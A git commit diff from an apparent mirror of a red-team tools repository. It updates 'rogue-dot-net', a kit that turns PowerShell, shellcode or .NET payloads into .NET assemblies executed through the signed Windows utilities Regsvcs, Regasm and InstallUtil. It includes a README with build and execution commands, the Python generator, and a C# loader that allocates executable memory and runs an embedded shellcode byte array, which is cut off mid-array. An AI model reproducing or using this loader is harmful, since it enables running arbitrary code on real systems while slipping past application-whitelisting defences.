mirror of
https://github.com/mgeeky/Penetration-Testing-Tools.git
synced 2024-11-25 12:01:37 +01:00
Updated rogue-dot-net
This commit is contained in:
parent
1138751330
commit
72c1136fda
@ -316,7 +316,7 @@ $ ./markOwnedNodesInNeo4j.py kerberoasted.txt
|
|||||||
|
|
||||||
- [**`PhishingPost`**](https://github.com/mgeeky/PhishingPost) - (PHP Script intdended to be used during Phishing campaigns as a credentials collector linked to backdoored HTML <form> action parameter.
|
- [**`PhishingPost`**](https://github.com/mgeeky/PhishingPost) - (PHP Script intdended to be used during Phishing campaigns as a credentials collector linked to backdoored HTML <form> action parameter.
|
||||||
|
|
||||||
- [**`regsvcs`**](https://github.com/mgeeky/Penetration-Testing-Tools/tree/master/red-teaming/regsvcs) - Set of scripts, requirements and instructions for generating .NET Assemblies valid for **Regasm**/**Regsvcs** code execution primitives.
|
- [**`rogue-dot-net`**](https://github.com/mgeeky/Penetration-Testing-Tools/tree/master/red-teaming/rogue-dot-net) - Set of scripts, requirements and instructions for generating .NET Assemblies valid for **Regasm**/**Regsvcs**/**InstallUtil** code execution primitives.
|
||||||
|
|
||||||
- [**`RobustPentestMacro`**](https://github.com/mgeeky/RobustPentestMacro) - This is a rich-featured Visual Basic macro code for use during Penetration Testing assignments, implementing various advanced post-exploitation techniques.
|
- [**`RobustPentestMacro`**](https://github.com/mgeeky/RobustPentestMacro) - This is a rich-featured Visual Basic macro code for use during Penetration Testing assignments, implementing various advanced post-exploitation techniques.
|
||||||
|
|
||||||
|
@ -1,78 +0,0 @@
|
|||||||
## Rogue .NET Assembly for Regsvcs/Regasm Code Execution
|
|
||||||
|
|
||||||
Follow below described steps to properly generate your source code and then compile it to a .NET Assembly valid for Regasm/Regsvcs:
|
|
||||||
|
|
||||||
### Step 1: Generate key.snk file
|
|
||||||
|
|
||||||
```
|
|
||||||
powershell -file build.ps1
|
|
||||||
```
|
|
||||||
|
|
||||||
### Step 2: Generate source code file
|
|
||||||
|
|
||||||
Included in this directory script is a helper utility allowing one to quickly generate desired csharp source code file to be used for further `csc` compilation.
|
|
||||||
|
|
||||||
Usage:
|
|
||||||
|
|
||||||
```
|
|
||||||
python3 generateRegsvcs.py --help
|
|
||||||
|
|
||||||
:: Regsvcs Code Execution Source code generation utility
|
|
||||||
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm.
|
|
||||||
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
|
||||||
|
|
||||||
usage: .\generateRegsvcs.py [options] <inputFile>
|
|
||||||
|
|
||||||
positional arguments:
|
|
||||||
inputFile Input file to be embeded within C# code. May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file.
|
|
||||||
|
|
||||||
optional arguments:
|
|
||||||
-h, --help show this help message and exit
|
|
||||||
-e, --exe Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE!
|
|
||||||
-r, --raw Specified input file is a raw Shellcode to be injected in self process in a separate Thread.
|
|
||||||
```
|
|
||||||
|
|
||||||
Sample use case:
|
|
||||||
|
|
||||||
```
|
|
||||||
python3 generateRegsvcs.py -r notepad64.bin > program.cs
|
|
||||||
|
|
||||||
:: Regsvcs Code Execution Source code generation utility
|
|
||||||
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm.
|
|
||||||
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
|
||||||
|
|
||||||
[?] File specified as raw Shellcode.
|
|
||||||
|
|
||||||
```
|
|
||||||
|
|
||||||
|
|
||||||
### Step 3: Compilate library .NET Assembly
|
|
||||||
|
|
||||||
```
|
|
||||||
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs
|
|
||||||
```
|
|
||||||
|
|
||||||
If you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script). Then proper compilation command will be:
|
|
||||||
|
|
||||||
```
|
|
||||||
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs
|
|
||||||
```
|
|
||||||
|
|
||||||
|
|
||||||
### Step 4: Code execution via Regsvcs or Regasm:
|
|
||||||
|
|
||||||
```
|
|
||||||
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll
|
|
||||||
```
|
|
||||||
or
|
|
||||||
```
|
|
||||||
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe regsvcs.dll
|
|
||||||
```
|
|
||||||
or
|
|
||||||
```
|
|
||||||
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U regsvcs.dll
|
|
||||||
```
|
|
||||||
or
|
|
||||||
```
|
|
||||||
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U regsvcs.dll
|
|
||||||
```
|
|
Binary file not shown.
90
red-teaming/rogue-dot-net/README.md
Normal file
90
red-teaming/rogue-dot-net/README.md
Normal file
@ -0,0 +1,90 @@
|
|||||||
|
## Rogue .NET Assembly for Regsvcs/Regasm/InstallUtil Code Execution
|
||||||
|
|
||||||
|
Follow below described steps to properly generate your source code and then compile it into a nice rogue .NET Assembly ready to be executed by:
|
||||||
|
|
||||||
|
- [Regasm](https://lolbas-project.github.io/lolbas/Binaries/Regasm/)
|
||||||
|
- [Regsvcs](https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/)
|
||||||
|
- [InstallUtil](https://lolbas-project.github.io/lolbas/Binaries/Installutil/)
|
||||||
|
|
||||||
|
### Step 1: Generate key.snk file
|
||||||
|
|
||||||
|
```
|
||||||
|
powershell -file build.ps1
|
||||||
|
```
|
||||||
|
|
||||||
|
### Step 2: Generate source code file
|
||||||
|
|
||||||
|
Included in this directory script is a helper utility allowing one to quickly generate desired csharp source code file to be used for further `csc` compilation.
|
||||||
|
|
||||||
|
Usage:
|
||||||
|
|
||||||
|
```
|
||||||
|
python3 generateRogueDotNet.py --help
|
||||||
|
|
||||||
|
:: Rogue .NET Source Code Generation Utility
|
||||||
|
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil.
|
||||||
|
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||||
|
|
||||||
|
usage: .\generateRogueDotNet.py [options] <inputFile>
|
||||||
|
|
||||||
|
positional arguments:
|
||||||
|
inputFile Input file to be embeded within C# code. May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file.
|
||||||
|
|
||||||
|
optional arguments:
|
||||||
|
-h, --help show this help message and exit
|
||||||
|
-e, --exe Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE!
|
||||||
|
-r, --raw Specified input file is a raw Shellcode to be injected in self process in a separate Thread.
|
||||||
|
```
|
||||||
|
|
||||||
|
Sample use case:
|
||||||
|
|
||||||
|
```
|
||||||
|
python3 generateRogueDotNet.py -r notepad64.bin > program.cs
|
||||||
|
|
||||||
|
:: Rogue .NET Source Code Generation Utility
|
||||||
|
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil.
|
||||||
|
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||||
|
|
||||||
|
[?] File specified as raw Shellcode.
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
### Step 3: Compilate library .NET Assembly
|
||||||
|
|
||||||
|
```
|
||||||
|
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
|
||||||
|
```
|
||||||
|
|
||||||
|
If you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script). Then proper compilation command will be:
|
||||||
|
|
||||||
|
```
|
||||||
|
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
### Step 4: Code execution via Regsvcs, Regasm or InstallUtil:
|
||||||
|
|
||||||
|
- x86:
|
||||||
|
```
|
||||||
|
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe rogue.dll
|
||||||
|
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U rogue.dll
|
||||||
|
|
||||||
|
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe rogue.dll
|
||||||
|
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U rogue.dll
|
||||||
|
|
||||||
|
%WINDIR%\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
||||||
|
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
||||||
|
```
|
||||||
|
|
||||||
|
- x64:
|
||||||
|
```
|
||||||
|
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe rogue.dll
|
||||||
|
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U rogue.dll
|
||||||
|
|
||||||
|
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe rogue.dll
|
||||||
|
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe /U rogue.dll
|
||||||
|
|
||||||
|
%WINDIR%\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
||||||
|
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
||||||
|
```
|
@ -1,28 +1,38 @@
|
|||||||
#!/usr/bin/python3
|
#!/usr/bin/python3
|
||||||
#
|
#
|
||||||
# Red-Teaming script that constructs C# code for Regsvcs code execution technique.
|
# Red-Teaming script that constructs C# code for Regsvcs/Regasm/InstallUtil code execution technique.
|
||||||
#
|
#
|
||||||
# Step 1: Generate source code file
|
# Step 1: Generate source code file
|
||||||
# cmd> python3 generateRegsvcs.py -r payload.bin > program.cs
|
# cmd> python3 generateRogueDotNet.py -r payload.bin > program.cs
|
||||||
#
|
#
|
||||||
# Step 2: Compilate library .NET Assembly
|
# Step 2: Compilate library .NET Assembly
|
||||||
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs
|
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
|
||||||
#
|
#
|
||||||
# if you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used
|
# if you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used
|
||||||
# to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script).
|
# to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script).
|
||||||
# Then proper compilation command will be:
|
# Then proper compilation command will be:
|
||||||
#
|
#
|
||||||
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs
|
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
|
||||||
#
|
#
|
||||||
#
|
# Step 3: Code execution via Regsvcs, Regasm or InstallUtil:
|
||||||
# Step 3: Code execution via Regsvcs or Regasm:
|
# x86:
|
||||||
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll
|
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe rogue.dll
|
||||||
# or
|
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe rogue.dll
|
||||||
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe regsvcs.dll
|
|
||||||
# or
|
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U rogue.dll
|
||||||
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U regsvcs.dll
|
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U rogue.dll
|
||||||
# or
|
|
||||||
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U regsvcs.dll
|
# cmd> %WINDIR%\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
||||||
|
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
||||||
|
# x64:
|
||||||
|
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe rogue.dll
|
||||||
|
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe rogue.dll
|
||||||
|
|
||||||
|
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe /U rogue.dll
|
||||||
|
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U rogue.dll
|
||||||
|
|
||||||
|
# cmd> %WINDIR%\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
||||||
|
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
||||||
#
|
#
|
||||||
# Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
# Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||||
#
|
#
|
||||||
@ -203,13 +213,13 @@ $usings
|
|||||||
Set-Content key.snk -Value $Content -Encoding Byte
|
Set-Content key.snk -Value $Content -Encoding Byte
|
||||||
|
|
||||||
Step 2: Compile source code:
|
Step 2: Compile source code:
|
||||||
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs
|
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
|
||||||
|
|
||||||
Step 3: Execute your payload!
|
Step 3: Execute your payload!
|
||||||
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe regsvcs.dll
|
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe rogue.dll
|
||||||
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe regsvcs.dll
|
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe rogue.dll
|
||||||
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U regsvcs.dll
|
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U rogue.dll
|
||||||
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U regsvcs.dll
|
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U rogue.dll
|
||||||
*/
|
*/
|
||||||
|
|
||||||
namespace Program
|
namespace Program
|
||||||
@ -235,6 +245,16 @@ namespace Program
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
[System.ComponentModel.RunInstaller(true)]
|
||||||
|
public class ForInstallUtil : System.Configuration.Install.Installer
|
||||||
|
{
|
||||||
|
// This executes during InstallUtil /U invocation
|
||||||
|
public override void Uninstall(System.Collections.IDictionary savedState)
|
||||||
|
{
|
||||||
|
Shellcode.Execute();
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
public class Shellcode
|
public class Shellcode
|
||||||
{
|
{
|
||||||
$launchCode
|
$launchCode
|
||||||
@ -284,13 +304,13 @@ def opts(argv):
|
|||||||
|
|
||||||
def main(argv):
|
def main(argv):
|
||||||
sys.stderr.write('''
|
sys.stderr.write('''
|
||||||
:: Regsvcs Code Execution Source code generation utility
|
:: Rogue .NET Source Code Generation Utility
|
||||||
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm.
|
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil.
|
||||||
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||||
|
|
||||||
''')
|
''')
|
||||||
if len(argv) < 2:
|
if len(argv) < 2:
|
||||||
print('Usage: ./generateRegsvcs.py <inputFile>')
|
print('Usage: ./generateRogueDotNet.py <inputFile>')
|
||||||
sys.exit(-1)
|
sys.exit(-1)
|
||||||
|
|
||||||
args = opts(argv)
|
args = opts(argv)
|
||||||
@ -299,24 +319,22 @@ def main(argv):
|
|||||||
|
|
||||||
if args.exe:
|
if args.exe:
|
||||||
if not detectFileIsExe(args.inputFile, args.exe):
|
if not detectFileIsExe(args.inputFile, args.exe):
|
||||||
sys.stderr.write('[?] File not recognized as PE/EXE.\n\n')
|
sys.stderr.write('[-] File not recognized as PE/EXE.\n\n')
|
||||||
return False
|
return False
|
||||||
|
|
||||||
_format = 'exe'
|
_format = 'exe'
|
||||||
sys.stderr.write('[?] File recognized as PE/EXE.\n\n')
|
sys.stderr.write('[+] File recognized as PE/EXE.\n\n')
|
||||||
with open(args.inputFile, 'rb') as f:
|
with open(args.inputFile, 'rb') as f:
|
||||||
payload = f.read()
|
payload = f.read()
|
||||||
|
|
||||||
elif args.raw:
|
elif args.raw:
|
||||||
_format = 'raw'
|
_format = 'raw'
|
||||||
sys.stderr.write('[?] File specified as raw Shellcode.\n\n')
|
sys.stderr.write('[+] File specified as raw Shellcode.\n\n')
|
||||||
with open(args.inputFile, 'rb') as f:
|
with open(args.inputFile, 'rb') as f:
|
||||||
payload = f.read()
|
payload = f.read()
|
||||||
|
|
||||||
else:
|
else:
|
||||||
sys.stderr.write('[?] Powershell code given.\n')
|
sys.stderr.write('[+] Powershell code given.\n')
|
||||||
sys.stderr.write('[?] WARNING: You need to have System.Management.Automation assemblies preinstalled.\n')
|
|
||||||
sys.stderr.write(' Obtain them from: .\n\n')
|
|
||||||
|
|
||||||
if args.inputFile.endswith('.exe'):
|
if args.inputFile.endswith('.exe'):
|
||||||
return False
|
return False
|
||||||
@ -342,13 +360,17 @@ Step 1: Create Your Strong Name Key -> key.snk
|
|||||||
Set-Content key.snk -Value $Content -Encoding Byte
|
Set-Content key.snk -Value $Content -Encoding Byte
|
||||||
|
|
||||||
Step 2: Compile source code:
|
Step 2: Compile source code:
|
||||||
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll{} /target:library /out:regsvcs.dll /keyfile:key.snk program.cs
|
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll{} /target:library /out:rogue.dll /keyfile:key.snk program.cs
|
||||||
|
|
||||||
Step 3: Execute your payload!
|
Step 3: Execute your payload!
|
||||||
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe regsvcs.dll
|
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe rogue.dll
|
||||||
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe regsvcs.dll
|
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U rogue.dll
|
||||||
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U regsvcs.dll
|
|
||||||
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U regsvcs.dll
|
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe rogue.dll
|
||||||
|
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U rogue.dll
|
||||||
|
|
||||||
|
%WINDIR%\\Microsoft.NET\\Framework64\\v2.0.50727\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
||||||
|
%WINDIR%\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
||||||
'''.format(management)
|
'''.format(management)
|
||||||
|
|
||||||
if 'PROGRAMFILES(X86)' in os.environ:
|
if 'PROGRAMFILES(X86)' in os.environ:
|
BIN
red-teaming/rogue-dot-net/notepad64.bin
Normal file
BIN
red-teaming/rogue-dot-net/notepad64.bin
Normal file
Binary file not shown.
141
red-teaming/rogue-dot-net/program.cs
Normal file
141
red-teaming/rogue-dot-net/program.cs
Normal file
@ -0,0 +1,141 @@
|
|||||||
|
|
||||||
|
using System;
|
||||||
|
using System.Diagnostics;
|
||||||
|
using System.Reflection;
|
||||||
|
using System.Runtime.InteropServices;
|
||||||
|
using System.EnterpriseServices;
|
||||||
|
|
||||||
|
|
||||||
|
/*
|
||||||
|
Author: Casey Smith, Twitter: @subTee
|
||||||
|
Customized by: Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||||
|
License: BSD 3-Clause
|
||||||
|
|
||||||
|
Step 1: Create Your Strong Name Key -> key.snk
|
||||||
|
|
||||||
|
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
|
||||||
|
$Content = [System.Convert]::FromBase64String($key)
|
||||||
|
Set-Content key.snk -Value $Content -Encoding Byte
|
||||||
|
|
||||||
|
Step 2: Compile source code:
|
||||||
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs
|
||||||
|
|
||||||
|
Step 3: Execute your payload!
|
||||||
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll
|
||||||
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe regsvcs.dll
|
||||||
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U regsvcs.dll
|
||||||
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U regsvcs.dll
|
||||||
|
*/
|
||||||
|
|
||||||
|
namespace Program
|
||||||
|
{
|
||||||
|
public class Bypass : ServicedComponent
|
||||||
|
{
|
||||||
|
public Bypass()
|
||||||
|
{
|
||||||
|
}
|
||||||
|
|
||||||
|
// This executes if registration is successful
|
||||||
|
[ComRegisterFunction]
|
||||||
|
public static void RegisterClass( string key )
|
||||||
|
{
|
||||||
|
Shellcode.Execute();
|
||||||
|
}
|
||||||
|
|
||||||
|
// This executes if registration fails
|
||||||
|
[ComUnregisterFunction]
|
||||||
|
public static void UnRegisterClass( string key )
|
||||||
|
{
|
||||||
|
Shellcode.Execute();
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
[System.ComponentModel.RunInstaller(true)]
|
||||||
|
public class ForInstallUtil : System.Configuration.Install.Installer
|
||||||
|
{
|
||||||
|
// This executes during InstallUtil /U invocation
|
||||||
|
public override void Uninstall(System.Collections.IDictionary savedState)
|
||||||
|
{
|
||||||
|
Shellcode.Execute();
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
public class Shellcode
|
||||||
|
{
|
||||||
|
|
||||||
|
[DllImport("kernel32")]
|
||||||
|
private static extern IntPtr VirtualAlloc(
|
||||||
|
IntPtr lpAddress, UIntPtr dwSize,
|
||||||
|
UInt32 flAllocationType,
|
||||||
|
UInt32 flProtect
|
||||||
|
);
|
||||||
|
|
||||||
|
[DllImport("kernel32")]
|
||||||
|
private static extern bool VirtualFree(
|
||||||
|
IntPtr lpAddress,
|
||||||
|
UInt32 dwSize,
|
||||||
|
UInt32 dwFreeType
|
||||||
|
);
|
||||||
|
|
||||||
|
[DllImport("kernel32")]
|
||||||
|
private static extern IntPtr CreateThread(
|
||||||
|
UInt32 lpThreadAttributes,
|
||||||
|
UInt32 dwStackSize,
|
||||||
|
IntPtr lpStartAddress,
|
||||||
|
IntPtr param,
|
||||||
|
UInt32 dwCreationFlags,
|
||||||
|
ref UInt32 lpThreadId
|
||||||
|
);
|
||||||
|
|
||||||
|
[DllImport("kernel32")]
|
||||||
|
private static extern bool CloseHandle(
|
||||||
|
IntPtr hHandle
|
||||||
|
);
|
||||||
|
|
||||||
|
[DllImport("kernel32")]
|
||||||
|
private static extern UInt32 WaitForSingleObject(
|
||||||
|
IntPtr hHandle,
|
||||||
|
UInt32 dwMilliseconds
|
||||||
|
);
|
||||||
|
|
||||||
|
private static UInt32 MEM_COMMIT = 0x1000;
|
||||||
|
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
|
||||||
|
private static UInt32 MEM_RELEASE = 0x8000;
|
||||||
|
|
||||||
|
public static void Execute() {
|
||||||
|
|
||||||
|
byte[] payload = new byte[279] {
|
||||||
|
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51,
|
||||||
|
0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52,
|
||||||
|
0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
|
||||||
|
0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0xe2, 0xed,
|
||||||
|
0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48, 0x01, 0xd0, 0x8b, 0x80, 0x88,
|
||||||
|
0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44,
|
||||||
|
0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48,
|
||||||
|
0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1,
|
||||||
|
0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44,
|
||||||
|
0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49,
|
||||||
|
0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a,
|
||||||
|
0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41,
|
||||||
|
0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0x48, 0xba, 0x01, 0x00, 0x00,
|
||||||
|
0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x01, 0x01, 0x00, 0x00, 0x41, 0xba, 0x31, 0x8b,
|
||||||
|
0x6f, 0x87, 0xff, 0xd5, 0xbb, 0xf0, 0xb5, 0xa2, 0x56, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff,
|
||||||
|
